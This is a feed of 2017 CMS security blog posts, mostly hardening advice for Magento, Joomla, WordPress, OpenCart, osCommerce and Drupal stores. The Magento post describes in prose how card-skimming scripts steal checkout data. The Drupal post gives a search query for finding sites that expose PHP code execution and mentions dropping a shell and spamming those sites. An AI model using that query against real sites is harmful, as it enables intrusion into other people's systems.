siteguarding – Security Blog Tue, 31 Oct 2017 05:48:11 +0000 en-US hourly 1 siteguarding – Security Blog 32 32 Why Magento Security is Important Wed, 26 Jul 2017 11:13:54 +0000 Read More]]> magento security
Content management system Magento was developed in the US in 2007 by the well-known company Varien. The site management system Magento was developed in the US in 2007 by the well-known company Varien. Free CMS Magento is open-source software, developed on the basis ZendFramework and operates on a UNIX operating system. CMS is primarily suitable for developing large online stores. On this platform, there are already over 100,000 online resources in the network all over the world.

Opportunities and features of Magento

Based on a single Magento platform, you can instantly create several Internet resources and manage them at a time, which is very convenient for administration. The catalog system is well structured, there is the possibility of comparing the goods. Free management of prices for goods, stock additions and gift certificates makes working with the system convenient both for the site administrator and for the buyer, who can choose goods at a discount and sort it according to certain characteristics.

Additionally, Magento offers good opportunities for search engine optimization: access to the html code management; possibility for each product or category to add meta tags description and keywords; for each product you can add the right end in the site address, as well as Magento itself makes XML sitemap to the search engines. Magento provides a multicurrency and currency conversion system. This will become a convenient function for customers, regardless of the country in which they are located.

If you want to run your online store on Magento without using templates, you will need knowledge of HTML markup and CSS styles. However, to work with this CMS, it is best to hire a specialist in this field.

In addition to the platform, free and paid modules are provided that expand the functions of the CMS. All free of charge are recommended to be checked on the test form from the beginning, as many low-quality ones come across. For paid modules free technical support from developers is offered.

So, Magento CMS – a solid and high-quality platform, which is great for creating an online store. In some ways, it can be difficult for an inexperienced user, but its capabilities are much wider than other similar platforms. And if there are no functions in the basic configuration, then you can connect additional modules – at the moment there are more than four thousand different extensions.

Magento Security

The most popular recent version of using a hacked site on Magento is the installation of a spy script that tracks forms and sends the values that they enter to the hacker. So the hacker gets access to the data of bank cards from which customers pay for purchases in the store, as well as personal data of the cardholder. That is, all those values that the buyer enters at the stage of registration of the order.

The script is loaded on any page of the store, but it is active only where sensitive data is entered. Usually, these pages contain in the address fragments “onepage”, “checkout”, “onestep” – ordering pages.
The script extracts data from the fields of the form input, select, textarea, checkbox, forms a message from them and sends them to the attacker’s site through ajax.

To ensure Magento security, it is necessary to install the security patches issued by the manufacturer in a timely manner.

How to Harden Joomla Security Wed, 26 Jul 2017 09:42:18 +0000 Read More]]> joomla security
The virus is a software product and it does not get to the site by air. The virus is brought to the site after the hacking or the owner (administrator) of the site enters a virus with extensions and system templates. Lets consider the 6 main points of “entry” of viruses on the site.

1. Hacking server hosting provider

Any service hosting provider is, in fact, a large computer that is also exposed to attacks and infections. Unfortunately, if your sites are located on a service that has been or is being attacked, you can react to this situation only sequentially, that is, to eliminate the consequences of hacking or attacking.

Protection against hacking of the hosting provider’s service can only be preventative.

Choosing a hosting provider, choose only trusted and top-end services. Note whether the hosting provider is using its data center or rents it. In a reviews of the hosting provider pay attention to the statistics of its downtime and unavailability of sites.

The “defenders” of sites have the first “golden” rule: for each domain (site), you need to create a separate user account. It practically doesn’t work out for Shared Hosting (hosting, where under the same account, you are allowed to create 2-20 sites), but it is quite feasible on VDS-servers. Such separation of sites by accounts, isolates sites from each other and when one site is infected, excludes a similar infection of other sites of the account.

2. Hacking the site through “holes”, the vulnerability of CMS

Any content management system (CMS) eventually becomes vulnerable. Not an exception and CMS Joomla. That is why it’s important for Joomla Security to monitor the system updates and periodically update it with new security releases.

3. Hacking CMS Joomla

Methods hacking CMS are as follows:

– Hacking Web site and download shells and backdoors through various forms of downloads: photos, media files, and other files;
– Introduction of malicious code through spam mailing or through SQL injection;
– Theft of site administrator data (SQL injections, XSS attacks, bruteforce);
– Website infection through third-party extensions and templates;
– Downloading extensions and templates from blogs and Webmasters’ sites, even the most famous ones, is the direct way to possible infection of the site. Sometimes, such a chain-loading extension, from user to user, leads to massive infection;
– Not recommended and all kinds of “torrent” trackers, offering a free download of a paid extension or template.

4. Hacking the Joomla site with a brute force attack

Bruteforce attack is the selection of the name and password of the site administrator. This loophole is closed by complex administrator passwords and changing the administrator’s name from the “admin” to another one.

5. Website hijacking FTP interception

Working with the site impossible to manage without access to an FTP site directory. FTP protocol is quite accessible and it would be strange if the attackers did not try to use this loophole. To protect yourself from this loophole, you need to use the SFTP protocol, create a separate FTP account for each site and not to store passwords in the FTP client.

6. Unprofessionalism of hired freelancers

If you do not deal with the site by yourself and hire freelancers to change design or other work, it is possible a virus code infection.

How to harden WP security Wed, 26 Jul 2017 09:36:48 +0000 Read More]]>
Many have seen reports that another site was hacked. Perhaps someone personally came across this. How can a site be hacked, and what protection measures can be taken? We will talk about what needs to be done to protect your site and not become a victim of hackers.

Hacking a site is getting unauthorized access to the site files or to the administration panel of the site management system.

In this article, we will not consider hacking hosting on which the site works, and will focus only on hacking the site itself.

First of all, note that if you do not do anything, then sooner or later the site will be hacked!

The fact is that modern sites on WordPress have about 500 thousand lines of code. Also this code is for the most part open and anyone can analyze it, including the vulnerability. In such a huge array, sooner or later they will find an error, and the attackers will want to use it.

A site on a sample platform, such as WordPress, can be recognized by its signature features. Having crawled your site on a set of signatures, you can find out a lot of details: the name and version of a typical platform, what plugins and extensions are installed and their versions, the list of users, and so on.

There is a huge number of different online scanners that constantly scan the network in search of sites based on this platform. When your site is scanned by one of the scanners, this is a matter of the near future.

In order to make it difficult to scan your site, you can install plugins that will hide the version of WordPress.

It is extremely important for WordPress Security to make periodic updates. Updates not only cover the vulnerabilities found, but can also contain new improved functionality, improve the site’s performance. However, before updating, you should make a backup copy of the site in case there was an error in the update by the developers or something went wrong. It is also important to check the site after the next update.

A common way to hack a site is to get passwords to the administrative panel of the site. How do hackers get passwords? intercept the password that has been transmitted through unprotected HTTP protocol, pick the password by brute force, decrypt the password by accessing the site database.

The best way to protect against this type of attack is to use a secure HTTPS protocol instead of HTTP. To protect yourself from such an attack, you need the entire site or at least the administrative panel of your site to be accessible only through the secure HTTPS protocol. This requires an SSL certificate. Certified certificates cost money and have a finite period of validity.

Attack by brute force – is a very common method of attack on the network by WordPress sites. Of course, no one will pick up passwords manually. For the selection of passwords there are special programs.

To ensure security, you need to set a password for the wp-admin folder, rename the page address to enter the administrative menu, grab the input and the forgotten password page, disable the error message for the wrong password, prohibit the enumeration of all users.

Unfortunately, you will not be able to completely secure your site from hacking. The fact is that you need to close all possible loopholes, and the attacker must find only one single one. However, do not be discouraged. If you follow the security rules, then it will be extremely difficult and long to hack your site.

How to Secure OpenCart CMS Tue, 25 Jul 2017 11:13:25 +0000 Read More]]> opencart cms
OpenCart, like some other CMS, can be called a relatively secure platform. However, as with other content management systems, it is better to immediately take care of the security and protection of your site from hacking by unauthorized persons. In this article, we’ll give you basic tips that will help you to improve the OpenCart Security of your site. First of all, the article is suitable for those who have their own online stores made on the basis of OpenCart, but, on the other hand, the tips are quite universal, so they will be interesting to site owners on other CMS.

1. Hiding the login to the administrative panel

By default, in order to enter the admin panel, usually used the following: your_site/admin. Naturally, the more information the hackers have, the easier it will be for them to hack your site. Therefore, the first recommendation is to change the login address to the admin panel from /admin to another: /manager, /panel or something even more complicated.

How to do it: in the file manager or in phpMyAdmin, first, change the name of the folder “admin” to another; second, make the same replacement in the “config.php” file inside the folder that you renamed; thirdly, sometimes you need to make changes to the “config.php” file in the root folder (check if there is mention of “admin” there).

2. Change the administrator’s login and password

After changing the address to enter the panel it is worth to think about changing the login, which also by default looks like “admin”. It should be noted that this is generally the main login, which is usually used on many CMS, so even if you have a store or site not on OpenCart, I still advise you to immediately change it.

How to do it: go to the admin panel, select “System”, then “Users” and again “Users”. See the line in the login “admin” – go to the settings and change the login to another.

By the way, right there you can change the password – I strongly recommend that you do this by creating a password no shorter than ten characters. If you can not figure it out yourself, use one of the online services for generating passwords, which can be easily found in Google.

3. Change access rights for important files

Two files, namely config.php in the root folder and config.php in the folder that by default is called admin (whose name was changed above) contain important information associated with the database, so it is recommended to change the permissions for these files to “Reading Only”.

How to do it: you can change the rights with any tool that you use to work with files. The easiest way is to change them directly in the hosting control panel.

4. Failure to display errors

As a rule, hacking websites, hackers use different loopholes, and error messages that are displayed on the wrong actions are often very helpful for them. Therefore, I recommend you to refuse displaying these errors.

Here you, most likely, will have a question, but what if you need to look at the mistakes? To do this, you can use the error log file (its name is in the same block in the settings).

You can view it if you go to the root folder of the site, then in system and then in logs.

How to do it: go to the admin panel, point “System”, then “Settings” – and there in the settings open the “Server” tab, at the bottom there will be the “Errors” block, there you should put “No” in “Show errors”.

How to Protect osCommerce CMS from Hackers Tue, 25 Jul 2017 10:35:50 +0000 Read More]]> OSCOMMERCE CMS
OsCommerce is one of the most popular content management systems for online stores. Its main advantages are a wide variety of modules and functionals that allow you to create a store of any complexity and any structure. However, it requires a certain professionalism.

OsCommerce is a free open source CMS that can be freely downloaded from the official portal of the system. There are also necessary modules and additions. Help and support can always be obtained in the community of osCommerce, thanks to the participants of which, by the way, there appeared a significant number of additional functionals of the system.

So today we will talk about the osCommerce Security of the online stores and safe behavior on the Internet.

Hacking online store is dangerous for both sides – the shop owner and customers. From the hacked store, attackers steal confidential information: customer contacts, bank card numbers and other valuable information. Hackers can completely break the store. As a result, the seller loses reputation, and buyers – anonymity.

There are a lot of ways to protect your online store from hacking. In this article we will talk about the most accessible.

1. Encrypt the connection

Connect an SSL certificate to the server of your online store to enable a secure connection between the buyer’s browser and the store. This connection is almost impossible to hack. Therefore, an SSL connection is a musthave for any site that processes customer’s personal data.

2. Timely updates

Hackers are constantly finding new vulnerabilities in programs: operating system, browser, CMS. You need to quickly close these holes in security by updates.

3. Two-step authorization

Two-stage authorization is one of the most reliable ways to protect from hacking, so this authorization is used by Internet banks.

After entering the login and password, you receive a message on the phone with an access code. Login to the site is possible only by entering this code in a special field on the authorization page. Even if the attacker receives your password, he can’t enter the site without your mobile phone.

4. Using Password Managers

For osCommerce security, you need to use complex passwords, unique to each resource. In order not to keep all passwords in the head or on a piece of paper under the keyboard, use the password manager. Password Manager will generate reliable passwords for you and store them. Access to passwords in the manager can be obtained only with the help of a master password. So just remember the master password.

5. Protect devices

All previous methods protect you against software hacking. But you can get a completely desperate attacker who will try to access your devices.

Imagine that an attacker has access to the computer from which you manage the site, and the browser is configured to auto-complete passwords. And now access is already in his hands.

To protect devices, set up encryption. The easiest way is to set the administrator password to log in to the computer and the lockscreen on the mobile device.

But it’s better to use advanced encryption. For different devices, different methods.

These methods – just the tip of the security. So start using them now if you are not already using it.

How to Hack Website on Drupal CMS Tue, 25 Jul 2017 10:23:28 +0000 Read More]]> drupal security

Drupal – one of the most famous and popular open CMS in PHP. CMS itself is built on the right approach and with an eye to safety guideline. CMS Drupal in its architecture is a very secure system, kernel and module security fixes come out quickly, and hacking it through holes is not so easy.

Drupal is reliable in itself. Only using unverified modules, programmer errors, creating their own modules for the site, also server configuration errors or non-compliance with the Drupal Security foundations can be the reason for the hacking.

By the way, very often the Drupal Security group issues security news with a critical level of vulnerability. Therefore, Drupal is safe for the time being, until a new version comes out, in which the removed vulnerability will be revealed to all hackers. Often sites on Drupal that are not updated immediately after the release of the security update are under attack by hackers.

As with other CMS, most of the vulnerabilities come out of various plugins, themes and other custom functions. It is most convenient to have a tool that shows the versions of Drupal and its components. Knowing them, you can search for known vulnerabilities.

Usually, vulnerabilities are detected by bots – programs that are written by hackers to search Internet sites on different CMS. Bots perform basic actions, for example, try to register or enter the admin 11111 password and other more complex actions. In case the site does have a vulnerability, the bot implements the program and sends information to the hacker database of broken sites, then the attacker can perform illegal actions if your site is profitable, for example, has a high attendance.

But now we will talk about the vulnerability of another kind, namely about the stupidity, oversights and disorder of those web developers, who gives an access to the input format “PHP Code” for anonymous and other users. And it allows you to run any php code without having access to the site admin area. In all instructions for Drupal Security write to be careful with the built-in module “PHP Code” andl not to permit access to it to strangers, and even less to unauthorized visitors. But, as we will see, these requirements are often neglected…

To search for vulnerable sites running on Drupal, will help us all-powerful Google. Its search operators allow you to find sites for many, very interesting parameters. We will look for indexed pages for editing materials, where one (or only) input filter is “PHP code”.

Search Algorithm:
1. The page URL must contain “node” and “edit”;
2. The page in the text should mention the phrase “You may post PHP code”.

The “inurl” operator, which allows us to find sites containing certain words in the URL, will help us in this, in our case this is “node” and “edit”.

A search for these criteria is performed by the line: inurl:node inurl:edit “You may post PHP code”

Next you will see a list of vulnerable sites running on Drupal. Obviously, many of them have already been used by spammers.

What to do with it to protect your Drupal website? Pour the shell, spam the site, scan the server.

How to protect yourself from this? Disable the “PHP Code” module. If this can not be done at all, then limit the rights to it to a minimum of people, preferably only to the chief administrator.

So don’t commit such nonsense, keep your kernel and modules up-to-date and your site will be safe!